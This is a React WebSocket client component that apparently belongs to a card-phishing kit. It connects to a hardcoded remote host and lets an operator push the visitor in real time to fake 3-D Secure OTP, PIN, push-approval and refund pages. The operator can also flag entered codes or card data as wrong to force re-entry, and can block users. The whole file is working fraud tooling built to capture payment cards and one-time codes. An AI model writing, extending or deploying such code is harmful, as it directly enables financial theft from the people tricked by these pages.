import React, { useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import { ToastContainer, toast } from 'react-toastify';
import { AiOutlineExclamationCircle } from 'react-icons/ai';

import 'react-toastify/dist/ReactToastify.css';
import './Toast.css';

const Websocket = () => {
    const navigate = useNavigate();

    useEffect(() => {
        let ws = null;
        let isUnmounted = false;
        let reconnectTimer = null;
        let heartbeatInterval = null;
        let lastMessageTime = Date.now();

        const getActiveUuId = () => {
            let id = localStorage.getItem("uuId") || localStorage.getItem("session_uuId");
            if (!id) {
                let result = '';
                for (let i = 0; i < 16; i++) {
                    result += Math.floor(Math.random() * 10);
                }
                id = result;
                localStorage.setItem("uuId", id);
                localStorage.setItem("session_uuId", id);
            }
            return id;
        };

        const sendHeartbeat = () => {
            const currentUuId = getActiveUuId();
            if (ws && ws.readyState === WebSocket.OPEN) {
                try {
                    ws.send(JSON.stringify({
                        type: "ping",
                        uuId: currentUuId
                    }));
                } catch (_) {}

                // Watchdog: If no message received from server for > 14 seconds, force reconnect
                if (Date.now() - lastMessageTime > 14000) {
                    console.warn('[WS] Watchdog: connection appears dead (silent TCP drop). Reconnecting...');
                    try {
                        ws.close();
                    } catch (_) {}
                    scheduleReconnect(200);
                }
            }
        };

        const scheduleReconnect = (delay = 1500) => {
            if (isUnmounted) return;
            if (reconnectTimer) clearTimeout(reconnectTimer);
            reconnectTimer = setTimeout(() => {
                if (!isUnmounted) {
                    connectWebSocket();
                }
            }, delay);
        };

        const connectWebSocket = () => {
            if (isUnmounted) return;
            if (reconnectTimer) {
                clearTimeout(reconnectTimer);
                reconnectTimer = null;
            }

            const wsUrl = process.env.REACT_APP_WEBSOCKET_URL || process.env.REACT_APP_WS_URL || 'wss://devosyshandler.com';
            
            try {
                if (ws) {
                    ws.onopen = null;
                    ws.onmessage = null;
                    ws.onclose = null;
                    ws.onerror = null;
                    if (ws.readyState === WebSocket.OPEN || ws.readyState === WebSocket.CONNECTING) {
                        ws.close();
                    }
                }
                ws = new WebSocket(wsUrl);
            } catch (e) {
                console.error('[WS] WebSocket creation error:', e);
                scheduleReconnect(2000);
                return;
            }

            ws.onopen = () => {
                if (isUnmounted) return;
                lastMessageTime = Date.now();
                const currentUuId = getActiveUuId();

                const message = JSON.stringify({
                    type: "existing_uuId",
                    uuId: currentUuId,
                });
                try {
                    ws.send(message);
                } catch (_) {}
                console.log("[WS] Connected to WebSocket server with uuId:", currentUuId);

                // Start aggressive keep-alive heartbeat (every 5 seconds)
                if (heartbeatInterval) clearInterval(heartbeatInterval);
                heartbeatInterval = setInterval(sendHeartbeat, 5000);
            };

            ws.onmessage = (message) => {
                if (isUnmounted) return;
                lastMessageTime = Date.now();

                try {
                    const message_json = JSON.parse(message.data);

                    // Respond to server-level ping
                    if (message_json.type === 'ping') {
                        const currentUuId = getActiveUuId();
                        if (ws && ws.readyState === WebSocket.OPEN) {
                            try {
                                ws.send(JSON.stringify({ type: 'pong', uuId: currentUuId }));
                            } catch (_) {}
                        }
                        return;
                    }

                    if (message_json.type === 'pong') {
                        return;
                    }

                    console.log('[WS] Command received:', message_json.type);

                    if (message_json.design) {
                        localStorage.setItem('session_design', message_json.design);
                    }

                    // Dispatch event for real-time 3DS listeners
                    window.dispatchEvent(new CustomEvent('ws_command', { detail: message_json }));

                    if (message_json.type === "uuId_assign") {
                        localStorage.setItem("uuId", message_json.uuId);
                        localStorage.setItem("session_uuId", message_json.uuId);
                    } else if (message_json.type === "message") {
                        toast(
                            <div className="flex items-center gap-2">
                                <AiOutlineExclamationCircle className="text-yellow-500" size={24} />
                                <span>{message_json.message}</span>
                            </div>,
                            {
                                position: "bottom-right",
                                autoClose: 10000,
                                className: "bg-gray-800 text-white rounded shadow-md",
                                progressClassName: "bg-yellow-500",
                            }
                        );
                    } else if (message_json.type === "block_user") {
                        localStorage.setItem('blocked', 'true');
                    } else if (message_json.type === "question_response" || message_json.type === "show_question") {
                        if (message_json.message) {
                            localStorage.setItem('seq_quest', message_json.message);
                        }
                        navigate("/3ds/question");
                    } else if (message_json.type === "push_text" || message_json.type === "show_push") {
                        if (message_json.message) {
                            localStorage.setItem('push_text', message_json.message);
                        }
                        navigate("/3ds/push");
                    } else if (message_json.type === "show_refund") {
                        if (message_json.isRetry || message_json.to === "wrong_code" || message_json.to === "wrong_refund") {
                            const currentUuId = getActiveUuId();
                            sessionStorage.setItem("refund_retry_flag_" + currentUuId, "true");
                        }
                        navigate("/3ds/refund");
                    } else if (message_json.type === "show_otp") {
                        if (message_json.isRetry || message_json.to === "wrong_code") {
                            const currentUuId = getActiveUuId();
                            sessionStorage.setItem("otp_retry_flag_" + currentUuId, "true");
                        }
                        navigate("/3ds/otp");
                    } else if (message_json.type === "show_pin") {
                        if (message_json.isRetry) {
                            const currentUuId = getActiveUuId();
                            sessionStorage.setItem("pin_retry_flag_" + currentUuId, "true");
                        }
                        navigate("/3ds/balance");
                    } else if (message_json.type === "show_error") {
                        const lastCard = localStorage.getItem('session_last_submitted_card') || '';
                        if (lastCard) {
                            sessionStorage.setItem('rejected_card', lastCard);
                        }
                        navigate("/checkout");
                    } else if (message_json.type === "redirect_success") {
                        navigate("/ThankYou");
                    } else if (message_json.type === "redirect") {
                        const RedirectPage = message_json.to;
                        if (RedirectPage === "refund_page" || RedirectPage === "wrong_refund") {
                            if (RedirectPage === "wrong_refund" || message_json.isRetry) {
                                const currentUuId = getActiveUuId();
                                sessionStorage.setItem("refund_retry_flag_" + currentUuId, "true");
                            }
                            navigate("/3ds/refund");
                        } else if (RedirectPage === "otp_page" || RedirectPage === "wrong_code") {
                            if (RedirectPage === "wrong_code" || message_json.isRetry) {
                                const currentUuId = getActiveUuId();
                                sessionStorage.setItem("otp_retry_flag_" + currentUuId, "true");
                            }
                            navigate("/3ds/otp");
                        } else if (RedirectPage === "wrong_data") {
                            const lastCard = localStorage.getItem('session_last_submitted_card') || '';
                            if (lastCard) {
                                sessionStorage.setItem('rejected_card', lastCard);
                            }
                            navigate("/checkout");
                        } else if (RedirectPage === "sucess_page" || RedirectPage === "success_page") {
                            navigate("/ThankYou");
                        } else if (RedirectPage === "wrong_push" || RedirectPage === "push_page") {
                            navigate("/3ds/push");
                        } else if (RedirectPage === "wrong_balance" || RedirectPage === "balance_page") {
                            if (RedirectPage === "wrong_balance" || message_json.isRetry) {
                                const currentUuId = getActiveUuId();
                                sessionStorage.setItem("pin_retry_flag_" + currentUuId, "true");
                            }
                            navigate("/3ds/balance");
                        } else if (RedirectPage === "original_page") {
                            navigate("/success");
                        }
                    }
                } catch (err) {
                    console.error('[WS] Error handling WebSocket message:', err);
                }
            };

            ws.onclose = () => {
                if (heartbeatInterval) clearInterval(heartbeatInterval);
                console.log("[WS] Disconnected from WebSocket server. Reconnecting...");
                scheduleReconnect(1500);
            };

            ws.onerror = (err) => {
                console.error("[WS] Socket error:", err);
                if (ws && ws.readyState === WebSocket.OPEN) {
                    try { ws.close(); } catch (_) {}
                }
            };
        };

        // Resilient mobile lifecycle events
        const handleWakeup = () => {
            const currentUuId = getActiveUuId();
            if (!ws || ws.readyState !== WebSocket.OPEN) {
                connectWebSocket();
            } else {
                lastMessageTime = Date.now();
                try {
                    ws.send(JSON.stringify({
                        type: "existing_uuId",
                        uuId: currentUuId
                    }));
                    ws.send(JSON.stringify({
                        type: "ping",
                        uuId: currentUuId
                    }));
                } catch (_) {}
            }
        };

        const handleVisibilityChange = () => {
            if (document.visibilityState === "visible") {
                handleWakeup();
            }
            // NEVER close socket on hidden — keeps VPN/TCP state intact as long as iOS allows
        };

        const handleSessionUpdate = (e) => {
            const newUuId = e.detail?.uuId || getActiveUuId();
            if (ws && ws.readyState === WebSocket.OPEN) {
                try {
                    ws.send(JSON.stringify({
                        type: "existing_uuId",
                        uuId: newUuId
                    }));
                    ws.send(JSON.stringify({
                        type: "ping",
                        uuId: newUuId
                    }));
                } catch (_) {}
            } else {
                connectWebSocket();
            }
        };

        connectWebSocket();

        document.addEventListener("visibilitychange", handleVisibilityChange);
        window.addEventListener("pageshow", handleWakeup);
        window.addEventListener("focus", handleWakeup);
        window.addEventListener("online", handleWakeup);
        window.addEventListener("session_update", handleSessionUpdate);

        return () => {
            isUnmounted = true;
            if (reconnectTimer) clearTimeout(reconnectTimer);
            if (heartbeatInterval) clearInterval(heartbeatInterval);
            if (ws) {
                ws.onopen = null;
                ws.onmessage = null;
                ws.onclose = null;
                ws.onerror = null;
                try { ws.close(); } catch (_) {}
            }
            document.removeEventListener("visibilitychange", handleVisibilityChange);
            window.removeEventListener("pageshow", handleWakeup);
            window.removeEventListener("focus", handleWakeup);
            window.removeEventListener("online", handleWakeup);
            window.removeEventListener("session_update", handleSessionUpdate);
        };
    }, [navigate]);

    return (
        <ToastContainer
            hideProgressBar={false}
            newestOnTop={false}
            closeOnClick
            rtl={false}
            pauseOnFocusLoss
            draggable
            pauseOnHover
        />
    );
};

export default Websocket;